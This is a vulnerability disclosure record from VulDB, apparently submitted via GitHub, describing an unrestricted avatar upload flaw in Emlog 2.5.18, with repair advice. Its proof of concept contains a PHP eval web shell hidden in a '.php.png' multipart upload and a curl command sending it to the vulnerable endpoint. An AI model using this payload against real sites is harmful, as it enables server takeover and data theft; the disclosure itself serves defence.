Gửi #631923: emlog.net Emlog 2.5.18 Unrestricted Uploadthông tin

tiêu đềemlog.net Emlog 2.5.18 Unrestricted Upload
Mô tả# Projectworlds emlog Project V2.5.18 /admin/blogger.php?action=update_avatar File unrestricted upload # NAME OF AFFECTED PRODUCT(S) - emlog ## Vendor Homepage - emlog.net # AFFECTED AND/OR FIXED VERSION(S) ## submitter - l1nk ## Vulnerable File - /admin/blogger.php?action=update_avatar ## VERSION(S) - V2.5.18 ## Software Link - https://www.emlog.net/ # PROBLEM TYPE ## Vulnerability Type - File unrestricted upload ## Root Cause - A file unrestricted upload vulnerability was found in the '/admin/blogger.php?action=update_avatar' file of the 'emlog' project. The reason for this issue is that attackers can upload arbitrary files (including malicious scripts) through the parameter without proper verification of file type, size, content, or storage path, allowing them to execute malicious code on the server and perform unauthorized operations. ## Impact - Attackers can exploit this file unrestricted upload vulnerability to upload malicious scripts (such as PHP, JSP, ASP files), gain server control, access or tamper with sensitive data, spread malware, and even cause service paralysis, posing a severe threat to system security and data confidentiality. # DESCRIPTION - During the security review of "emlog", I discovered a critical file unrestricted upload vulnerability in the "/admin/blogger.php?action=update_avatar" file. This vulnerability arises from inadequate validation and restrictions on the parameter when handling file uploads, enabling attackers to upload arbitrary files. As a result, attackers can execute malicious code on the server, gain unauthorized access to the system, and compromise data security. Immediate remedial measures are required to ensure system security and protect data integrity. # No login or authorization is required to exploit this vulnerability # Vulnerability details and POC ## Vulnerability location: - /admin/blogger.php?action=update_avatar ## Payload: ```makefile -----------------------------64766223829550656241846266132 Content-Disposition: form-data; name="image"; filename="渗透流程.php.png" Content-Type: image/png <?php @eval($_POST['shell']); ?> -----------------------------64766223829550656241846266132 ``` ## The following are screenshots of some specific information obtained from testing file uploads: ```bash 《curl -X POST -F "[email protected]" http://10.20.33.16/admin/blogger.php?action=update_avatar》 ``` <img width="2010" height="1110" alt="Image" src="https://github.com/user-attachments/assets/25e9f191-f19d-4d96-bdfd-5323f8c11ddc" /> <img width="1266" height="574" alt="Image" src="https://github.com/user-attachments/assets/e71d722c-2e9e-4d5e-8174-9c5715ff7a51" /> # Suggested repair 1. **Strict file type verification:** Verify the file type through MIME type checking, file extension whitelisting, and even file content inspection to ensure only allowed file types (such as images like .jpg, .png) can be uploaded. 2. **Set file size limits:** Restrict the size of uploaded files to prevent large files from consuming server resources or being used for malicious purposes. 3. **Store files outside the web root directory:** Save uploaded files in a directory that is not directly accessible via the web, and use a script to read and deliver files when needed, avoiding direct execution of uploaded files. 4. **Rename uploaded files:** Generate a unique random name for each uploaded file instead of using the original filename, which can prevent path traversal attacks and ensure file uniqueness. 5. **Regular security audits:** Regularly check the file upload function and related code to identify and fix potential security loopholes in a timely manner. <img width="2010" height="1110" alt="Image" src="https://github.com/user-attachments/assets/25e9f191-f19d-4d96-bdfd-5323f8c11ddc" /> <img width="1266" height="574" alt="Image" src="https://github.com/user-attachments/assets/e71d722c-2e9e-4d5e-8174-9c5715ff7a51" />
Nguồn⚠️ https://github.com/lan041221/cvec/issues/8
Người dùng
 l1nk (UID 76857)
Đệ trình11/08/2025 15:40 (cách đây 9 các tháng)
Kiểm duyệt21/08/2025 07:18 (10 days later)
Trạng tháiđược chấp nhận
Mục VulDB320901 [Emlog Pro đến 2.5.18 blogger.php?action=update_avatar image nâng cao đặc quyền]
điểm20

TrướcTổng QuanTiếp theo

Do you want to use VulDB in your project?

Use the official API to access entries easily!